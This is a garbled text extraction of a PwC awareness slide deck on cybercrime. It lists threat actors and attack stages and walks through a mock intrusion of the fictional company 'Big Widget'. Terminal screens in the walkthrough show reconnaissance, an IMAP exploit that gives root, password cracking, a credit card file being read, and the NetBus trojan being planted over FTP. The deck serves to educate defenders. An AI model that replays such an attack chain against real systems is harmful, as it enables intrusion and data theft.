coady cybersecurity cybercrime.ppt - hfma region 9€¦ · 11/9/2015 6 registrant : big widget,...
TRANSCRIPT
11/9/2015
1
Cybersecurity & Cybercrime
Mick CoadyPartnerCybersecurity & Privacy
PwC 2
11/9/2015
2
A Total Novice Can be a Hacker TodayAttack Sophistication vs. Intruder Technical Knowledge
High
Cross site scripting Tools“stealth” / advanced
i t h i
Auto Coordinated
High
IntruderKnowledge
disabling audits
back doors
hijacking
sweepers
sniffers
packet spoofing
GUIautomated probes/scans
denial of service
www attacks
scanning techniques
network mgmt. diagnostics
distributedattack tools
Staged
IntrudersLow
1980 1985 1990 1995 2000
AttackSophistication
password guessing
self‐replicating code
password cracking
exploiting known vulnerabilities
j gsessionsburglaries
3
Common threats
Threats
• Hackers – “Script Kiddies”
• Employees – former and disgruntled
• Domestic Competitors – “Competitive Intelligence”
• State Sponsored & Corporate Espionage
PwC
• Extremists – Earth Liberation Front (ELF)
11/9/2015
3
Anatomy of an Attack
PwC
Anatomy of AttackModis Operandi
Physical Penetrations
Company Profiling – Open
Known Exploits
Port Redirection of Packetsp y g pSource Research
Footprinting – Scanning –Enumeration – Penetration -Escalate Privilege –Stealing/Damaging Corp. information
Trojans – remote controlling
Zone Transfers
SNMP Sweeps
Router Exploitation
Key Loggers – Software and Hardware devices
Denial of Service
PwC 6
Trojans remote controlling systems
Buffer Overflows
11/9/2015
4
Anatomy of AttackPhysical Penetrations
ill• Surveillance
• Dumpster Diving
• Impersonation of
Authorized Personnel
PwC 7
PwC 8
11/9/2015
5
PwC 9
Bigwidget.net
PwC 10
11/9/2015
6
Registrant :Big Widget, Inc. (BIGWIDGET_DOM)
1111 Big Widget DriveReally Big, CA 90120 US
Domain Name: BIGWIDGET.NET
Administrative Contact, Technical Contact: Zone Contact, Billing Contact:Simms, Haywood (HS69) Dodge, Rodger (RD32)
[email protected] [email protected] Big Widget Drive, UMIL04-07 1111 Big Widget Drive, UMIL04-47
Really Big, CA 90210 Really Big, CA 90210678-443-6001 678-443-6014
PwC 11
Record last updated on 24-June-2000Record expires on 20-Mar-2010Record created on 14-Mar-1998
Database last updated on 7-Jun-2000 15:54
Domain servers in listed order:
EHECATL.BIGWIDGET.NET 10.1.1.53NS1-AUTH.SPRINTLINK.NET 206.228.179.10
NS.COMMANDCORP.COM 130.205.70.10
~$ telnet mail.bigwidget.net 25
Trying 10.1.1.10 ...
Connected to mail.bigwidget.net
Escape character is '^]'.
hacker:
C i l d b f i h
hacker:~$
Connection closed by foreign host.
telnet mail.bigwidget.net 143
Trying 10.1.1.10...
Connected to mail.bigwidget.net. * OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT)
(Report problems in this server to [email protected])
PwC
. logout
* BYE bigwidget IMAP4rev1 server terminating connection. OK LOGOUT completed
Connection closed by foreign host.
12
11/9/2015
7
PwC13
hacker ~$./imap_exploit mail.bigwidget.com
IMAP Exploit for Linux.Author: Akylonius ([email protected])
Modifications: p1 ([email protected])
Completed successfully.
hacker ~$ telnet mail.bigwidget.com
Trying 10.1.1.10...
Connected to mail.bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)Kernel 2.0.35 on an i686
root
bigwidget:~#whoami
root
bigwidget:~# cat ./hosts
bigwidget:~# cd /etc
login:
PwC
127.0.0.1 localhost localhost.localdomain10.1.1.9 thevault medical records
10.1.1.11 fasttalk PACS10.1.1.12 geekspeak engineering
10.1.1.13 people human resources10.1.1.14 thelinks finance
10.1.1.15 thesource information systems
14
11/9/2015
8
Allan B. Smith 6543-2223-1209-4002 12/99Donna D. Smith 6543-4133-0632-4572 06/98Jim Smith 6543-2344-1523-5522 01/01Joseph L.Smith 6543-2356-1882-7532 04/02Kay L. Smith 6543-2398-1972-4532 06/03Mary Ann Smith 6543-8933-1332-4222 05/01Robert F. Smith 6543-0133-5232-3332 05/99
bigwidget:~#
cat visa.txt
cd /data/creditcards
bigwidget:~#
bigwidget:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman password: nambobusername: jsmith password: redbirdsusername: root password:
bigwidget:~# ftp thesource
Connected to thesource220 th Mi ft FTP S i (V i 4 0)
PwC
220 thesource Microsoft FTP Service (Version 4.0).
Name: jsmith
331 Password required for jsmith.
Password: ********
230 User jsmith logged in.
Remote system type is Windows_NT.
15
PwC16
11/9/2015
9
ftp> cd \temp
250 CDW command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.150 Opening BINARY mode data connection for netbus.exe226 Transfer complete.
ftp>
ftp>
quitftp> quit
thevault:~$ telnet thesource
Trying 10.1.1.15... Connected to thesource.bigwidget.com.Escape character is '^]'.
Microsoft (R) Windows 2000
Welcome to MS Telnet ServiceTelnet Server Build 5.00.98217.1
l i
PwC
login:jsmith
password: ********
*===============================================================Welcome to Microsoft Telnet Server.
*===============================================================C:\>cd \temp
C:\TEMP> netbus.exe
17
NetBus 1.6, by cfBi id @bi id t Fi @Bi Wid t
David Smith
Postmaster < [email protected] >
[email protected]; [email protected]
Greetings < URGENT >
Greetings Bigwidget employees:
I have officially compromised your entire system, and have obtained all of your accounting information.
Yours Truly,
Friendly Hacker
PwC
Connected to the.source.bigwidget.com
Screendump
18
11/9/2015
10
Web
NetBusNetBusimapimap
Anatomy of Attack (Continued)
Router
NetBusNetBus
FTP
imapimap
Firewall
Clients & Workstations
19
Cyber Security
http://map.ipviking.com